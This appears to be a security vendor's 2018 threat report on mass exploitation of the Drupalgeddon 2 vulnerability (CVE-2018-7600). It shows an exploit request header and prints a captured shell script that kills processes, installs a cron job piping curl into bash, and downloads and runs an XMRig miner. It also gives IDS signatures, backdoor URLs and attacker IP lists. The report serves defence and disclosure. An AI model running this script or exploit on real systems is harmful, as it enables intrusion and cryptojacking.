Drupalgeddon 2: Profiting from Mass Exploitation

On March 28, 2018, a patch for a highly critical vulnerability, which facilitates remote code execution against the Drupal content management system was released. The vulnerability was identified by Jasper Mattson of Druid and is covered by SA-2018-002 and CVE-2018-7600. Prior to the release of the patch, Drupal had given advanced notice of its impending release and potential consequences tied to the ease of the vulnerability’s exploitation. This sparked concerns of a new “Drupalgeddon”, where a large number of unpatched websites would be compromised. This comes on the heels of a major Drupal vulnerability from October 2014 that was widely exploited by advanced persistent threat (APT) actors and criminals that Volexity detailed in a previous blog post title Drupal Vulnerability: Mass Scans & Targeted Exploitation.

In a post dated April 13, 2018, the Drupal team stated the following:

The security team is now aware of automated attacks attempting to compromise Drupal 7 and 8 websites using the vulnerability reported in SA-CORE-2018-002. Due to this, the security team is increasing the security risk score of that issue to 24/25.

Sites not patched by Wednesday, 2018-04-11 may be compromised. This is the date when evidence emerged of automated attack attempts. It is possible targeted attacks occurred before that.

On Friday, April 13, 2018, public exploit code for the vulnerability was made widely available and large scale scanning and exploitation followed.

Drupalgeddon 2

Since early Friday (4/13), through its network security monitoring service, Volexity has observed thousands of scan and exploitation attempts for this latest Drupal vulnerability. If an unpatched server is found, the vulnerability allows for unauthenticated remote code execution under the privileges of the user which the web server and Drupal are configured to run. The uptick in scanning and exploit activity closely follows the aforementioned public release of exploit code.


The following is a sample of the exploit being performed by way of an HTTP POST request.  This allows the passing of specific parameters in order to achieve unauthenticated remote code execution against a public-facing webserver.

POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1

Host: <hostname>

Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: python-requests/2.18.4

Content-Length: 188

Content-Type: application/x-www-form-urlencoded



This specific example would cause a vulnerable Linux-based Drupal instance to perform a curl request to download the file logo8.jpg from the and execute its contents through the bash shell.

Volexity has observed a wide variety of actions and payloads attempted via this exploit. This includes reconnaissance efforts through simple echo statements or URL requests designed to verify exploitability, to malicious scripts installing backdoors and cryptocurrency miners. The attempt shown above is one of the most widespread attacks that Volexity has observed and, if successful, will culminate with the  delivery of a cryptocurrency miner (XMRig).

Volexity believes the scanning activity pushing this payload is associated with an individual or crime group observed exploiting the vulnerability CVE-2017-10271 on Oracle WebLogic servers shortly after proof of concept exploit code was made public in late 2017. Just as in the recent instance, the goal of the actor was to load the XMRig cryptocurrency miner onto targeted web servers. The XMR wallet observed in this latest attack activity is:


Research on this wallet reveals that the actor behind the account has been active since at least June of 2017, with the first reference online documented in a DC/OS Google Group post.

Big Money in Compromises

During the mining campaign targeting Oracle WebLogic servers, Volexity observed the actor utilizing the mining pool minexmr.com. This pool has since suspended the wallet from being used as shown below.

Recently, the actor has been observed using the mining pool monerohash.com. The account is still active, with the actor having earned 70.4 XMR coin as of this posting. At the current rate, this translates to approximately $13,400 USD.

Further review shows that the above XMR wallet address was once used on the cryptocurrency mining pool monero.crypto-pool.fr, with the last payment received being on 2018-04-01. The site has since suspended the usage of this wallet, however, not before a total of 544.74 XMR coin was mined.  This is the equivalent of $105,566.80 USD.

From Compromise to Cryptocurrency Mining

As referenced above, in one of the wider observed exploitation attempts for the recent Drupal vulnerability, an XMRig cryptocurrency mining payload would download onto compromised hosts through a script downloaded via The contents of this script are shown below.


ps aux | grep -vw suppoie | awk ‘{if($3>40.0) print $2}’ | while read procid


kill -9 $procid


rm -rf /dev/shm/jboss

ps -fe|grep -w suppoie |grep -v grep

if [ $? -eq 0 ]




crontab -r || true && \

echo “* * * * * curl -s | bash -s” >> /tmp/cron || true && \

crontab /tmp/cron || true && \

rm -rf /tmp/cron || true && \

curl -o /var/tmp/config.json

curl -o /var/tmp/suppoie

chmod 777 /var/tmp/suppoie

cd /var/tmp

proc=`grep -c ^processor /proc/cpuinfo`



/sbin/sysctl -w vm.nr_hugepages=`$num`

nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &


sleep 3

echo “runing…..”

This shell script will execute and perform the following actions:

  1. Find and kill specific Processes.
  2. Find and delete specific files if they exist.
  3. Echo the string “* * * * * curl -s | bash -s” to /tmp/cron and create a crontab entry with it.
  4. Download a configuration file from and save it as config.json in /var/tmp/ directory.
  5. Download an XMRig miner ELF executable file from and save it as suppoie in the /var/tmp/ directory.
  6. Perform checks to determine the number of cores on the compromised system. A different binary and configuration file located on the same external host may be downloaded depending on the results returned.
  7. The final command in the script will execute the ELF binary saved to /var/tmp/suppoie and perform crypto-mining functions for the Monero (XMR) wallet address 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo within the mining pool monerohash.com:5555.


The following intrusion detection system signatures can be used to look for commonly observed public exploit attempts against web servers. Note that Volexity has observed that scanning attempts are being indiscriminately fired at web servers, so expect that these may trigger several times in an hour against any public-facing system.


alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”Volexity – Possible Drupalgeddon2 (CVE-2018-7600) Exploit Attempt Detected”; flow:to_server, established; content:”POST”; http_method; content:”register?element_parents=account/”; http_uri; sid:2018041301; )


alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:”Volexity – Possible Drupalgeddon2 (CVE-2018-7600) Exploit Attempt Detected”; flow:to_server, established; content:”POST”; http_method; content:”register?element_parents=account/”; http_uri; sid:2018041301; )

Network Indicators

URL Notes
tc8zdw.if1j0ytgkypa.tk/i Shell script utilized to deliver an XMRig cryptocurrency miner (IP address:
mmsubtitles.co/fonts/aril.ttf Backdoor PHP exploit script (IP address: – Suspended by Cloudflare
havio.pl/themes/themes.css Backdoor PHP exploit script (IP address:
pastebin.com/raw/xJ6xzWek Backdoor PHP upload script containing the string “RxR HaCkErs”

Shell scripts used to load an XMRig miner for the Monero wallet 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo<webserver hostname> URL leveraged to report if a website is vulnerable. No payload or malicious code associated with this speciifc URL
stackoverflow666.sytes.net/3121.jpg Obfuscated PHP script (IP address: LinuxNet perlbot configuration used to set up an IRC bot that connects to the server and joins channel #2s. Likely used for DDoS activity. URL leveraged to report if a website is vulnerable. No payload or malicious code associated with this speciifc URL Script that will pull down an additional script to launch XMR miner from d.sdgndsfajfsdf.ltd (
ghostbin.com/paste/kchw9/raw PHP file upload backdoor saved under filename undx.php.

Volexity has observed numerous IP addresses involved in scanning and exploitation. Below is a list of IP addresses observed since last Friday.

Note: A handful of these IP addresses belong to security vendors conducting non-malicious scans. | 36947 | | ALGTEL | DZ | AS, DZ | 4134 | | CHINANET | CN | BACKBONE No.31,Jin-rong Street, CN | 21859 | | ZNET | US | Zenlayer Inc, US | 14061 | | DIGITALOCEAN-ASN | US | DigitalOcean, LLC, US | 16276 | | OVH, | FR | FR | 203071 | | VIRTUAL-TRADE | UA | LTD, UA | 206898 | | BLADESERVERS, | NL | NL | 205092 | | ORG-OGL6 | GB | RIPE, GB | 27668 | | ETAPA | EC | EP, EC | 27668 | | ETAPA | EC | EP, EC | 16276 | | OVH, | FR | FR | 50297 | | INFIUM, | UA | UA | 25092 | | OPATELECOM, | UA | UA | 25092 | | OPATELECOM, | UA | UA | 25092 | | OPATELECOM, | UA | UA | 25092 | | OPATELECOM, | UA | UA | 25092 | | OPATELECOM, | UA | UA | 197226 | | SPRINT | PL | SDC, PL | 18905 | | VCI-18905 | US | Virtual Citadel Inc., US | 43350 | | NFORCE, | NL | NL | 7552 | | VIETEL-AS | VN | AP Viettel Group, VN | 14618 | | AMAZON-AES | US | Amazon.com, Inc., US | 16276 | | OVH, | FR | FR | 198605 | | AVAST-AS | CZ | DC, CZ | 60781 | | LEASEWEB-NL-AMS | NL | 01 Netherlands, NL | 14618 | | AMAZON-AES | US | Amazon.com, Inc., US | 14618 | | AMAZON-AES | US | Amazon.com, Inc., US | 3462 | | HINET | TW | Data Communication Business Group, TW | 49981 | | WORLDSTREAM, | NL | NL | 3561 | | CENTURYLINK-LEGACY-S | US | Savvis, US | 3561 | | CENTURYLINK-LEGACY-S | US | Savvis, US | 6939 | | HURRICANE | US | Hurricane Electric LLC, US | 6724 | | STRATO | DE | STRATO AG, DE | 15395 | | RACKSPACE | GB | LON, GB | 9009 | | M247, | GB | GB | 206996 | | ALORANSA | LT | AS, LT | 31250 | | ONLINEDIRECT | BG | AS, BG | 16276 | | OVH, | FR | FR


Drupalgeddon 2 is absolutely upon us. The big difference between Drupalgeddon (2014) and Drupalgeddon 2 (2018) is there is now big money in these compromises. Cryptocurrency miners are being illicitly installed on systems at record rates and are generating hundreds of thousands of dollars for criminal operators. If you did not patch your Drupal CMS instance prior to April 13, 2018, there is very strong likelihood your web server has been compromised several times over. With that said, the most important step that can be taken towards mitigation of this threat is to patch all vulnerable systems immediately. All versions 7.x and 8.x of the Drupal CMS platform are vulnerable, with patches released as Drupal versions 7.58 and 8.5.1. Volexity recommends examining web logs to see if exploitation may have occurred against your server prior to April 13 as well. Keeping any public-facing system updated as soon as possible should be a top priority for all organizations and system administrators.